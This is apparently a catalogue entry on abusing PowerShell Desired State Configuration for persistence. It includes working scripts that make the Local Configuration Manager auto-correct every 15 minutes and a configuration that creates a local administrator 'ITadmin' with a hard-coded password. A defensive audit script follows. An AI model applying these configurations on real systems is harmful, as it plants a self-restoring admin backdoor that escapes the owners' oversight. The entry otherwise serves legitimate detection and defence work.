Desired State Configuration
Location:
N/A
Classification:
Criteria | Value |
---|---|
Permissions | Admin |
Security context | System |
Persistence type | Other |
Code type | Files ; Other ; Fileless |
Launch type | Automatic |
Impact | Non-destructive |
OS Version | All OS versions |
Dependencies | OS only |
Toolset | Scriptable |
Description:
Desired State Configuration (DSC) is a feature in PowerShell 4.0 and above that helps administrators to automate the configuration of Windows and Linux operating systems (OSes).
DSC provides a set of PowerShell language extensions, cmdlets and a process called declarative scripting.
Using DSC, administrators can ensure that a machine is set to a specific configuration and, if it deviates from that configuration, run scripts that restore the desired configuration.
After a DSC extension is set, the DSC Local Configuration Manager monitors the configuration, and any deviation it finds can be fixed by DSC scripts running with system privileges.
DSC can be run on a local or remote host on which the user has admin rights, so it can be used for lateral movement as well.
To abuse DSC for persistence, the Local Configuration Manager configuration might first need to be changed so that deviations are auto-corrected and configuration continues after reboot, and the frequency of monitoring and changing should be set to the desired value (minimum 15 minutes). This can be done with the following script:
```powershell
#Change DSC Local Configuration Manager
[DSCLocalConfigurationManager()]
Configuration SetDSCLMConfig
{
    node localhost
    {
        Settings
        {
            ActionAfterReboot = 'ContinueConfiguration' #Might be already set
            AllowModuleOverWrite = $true
            ConfigurationMode = 'ApplyAndAutoCorrect'
            ConfigurationModeFrequencyMins = 15 #Change this
        }
    }
}
#Compile the meta-configuration into a MOF document under the output path
SetDSCLMConfig -OutputPath C:\foo\bar | Out-Null
#Setting the configuration manager
Set-DscLocalConfigurationManager -Path C:\foo\bar -ComputerName localhost
```
After setting the Local Configuration Manager, the next step is to create a malicious configuration that suits our needs. Here is an example of a configuration that adds a user to the local Administrators group and creates a file.
```powershell
Configuration NotMalicious
{
    Node localhost
    {
        Script ScriptExample
        {
            #SetScript runs whenever TestScript returns $false
            SetScript = {
                $username = "ITadmin"
                $password = ConvertTo-SecureString "password123!!" -AsPlainText -Force
                $exist = Get-LocalUser -Name $username -ErrorAction SilentlyContinue
                if($exist -eq $null)
                {
                    New-LocalUser -Name $username -Password $password -FullName "Real IT admin"
                    Add-LocalGroupMember -Group "Administrators" -Member $username
                }
                Write-Output "$(whoami) just added ITadmin" > C:\foo\bar\dsc.txt
            }
            #$exist is assigned only inside SetScript, so it is $null in the two blocks below
            TestScript = {
                return ($exist -ne $null)
            }
            GetScript = { @{ Result = ($exist -ne $null) } }
        }
    }
}
#Compile the configuration into a MOF document under the output path
NotMalicious -OutputPath C:\foo\bar | Out-Null
#Start the configuration
Start-DscConfiguration -Path "C:\foo\bar" -ComputerName localhost | Out-Null
```
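A host-side check for the changes described above, as an added example that is not part of the original entry: it reports the LCM settings, lists Script resources recorded in the DSC run history, and shows when the stored MOF documents were last written. The function name and output fields are hypothetical, and `ApplyAndAutoCorrect` is only an indicator for review, since hosts legitimately managed with DSC also use it.

```powershell
#Requires -RunAsAdministrator
# Added audit example; the function name and output fields are hypothetical.
function Get-DscPersistenceIndicator {
    [CmdletBinding()]
    param()

    # 1. LCM meta-configuration: the settings the first script on this page changes.
    #    ApplyAndMonitor is the default mode, so ApplyAndAutoCorrect on a host
    #    that is not managed with DSC deserves a closer look.
    $lcm = Get-DscLocalConfigurationManager
    [pscustomobject]@{
        Check  = 'LCM settings'
        Review = ($lcm.ConfigurationMode -eq 'ApplyAndAutoCorrect')
        Detail = '{0}, every {1} min, after reboot: {2}' -f $lcm.ConfigurationMode,
                 $lcm.ConfigurationModeFrequencyMins, $lcm.ActionAfterReboot
    }

    # 2. Recorded run history. Get-DscConfigurationStatus only reads stored
    #    results; Get-DscConfiguration would call each resource's Get method,
    #    which for a Script resource executes its GetScript.
    try   { $runs = @(Get-DscConfigurationStatus -All -ErrorAction Stop) }
    catch { $runs = @() }   # no recorded runs, or the history could not be read
    $resources = foreach ($run in $runs) {
        $run.ResourcesInDesiredState
        $run.ResourcesNotInDesiredState
    }
    $scripts = @($resources |
        Where-Object { $_.ResourceId -and $_.ResourceId.StartsWith('[Script]') } |
        Sort-Object ResourceId -Unique)
    foreach ($s in $scripts) {
        [pscustomobject]@{
            Check  = 'Script resource'
            Review = $true
            Detail = '{0} in configuration {1}' -f $s.ResourceId, $s.ConfigurationName
        }
    }

    # 3. Documents the LCM keeps on disk; write times show when a configuration
    #    or meta-configuration was last applied.
    $store = Join-Path $env:SystemRoot 'System32\Configuration'
    Get-ChildItem -Path $store -Filter '*.mof' -ErrorAction SilentlyContinue | ForEach-Object {
        [pscustomobject]@{
            Check  = 'MOF store'
            Review = $false
            Detail = '{0} written {1:yyyy-MM-dd HH:mm}' -f $_.Name, $_.LastWriteTime
        }
    }
}

Get-DscPersistenceIndicator | Format-Table -AutoSize -Wrap
```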
References:
- DSC Tutorial
- DSC Attack Framework
- Azure DSC Persistence
- DSC Community
Credits:
- Entry added by @Tamirye94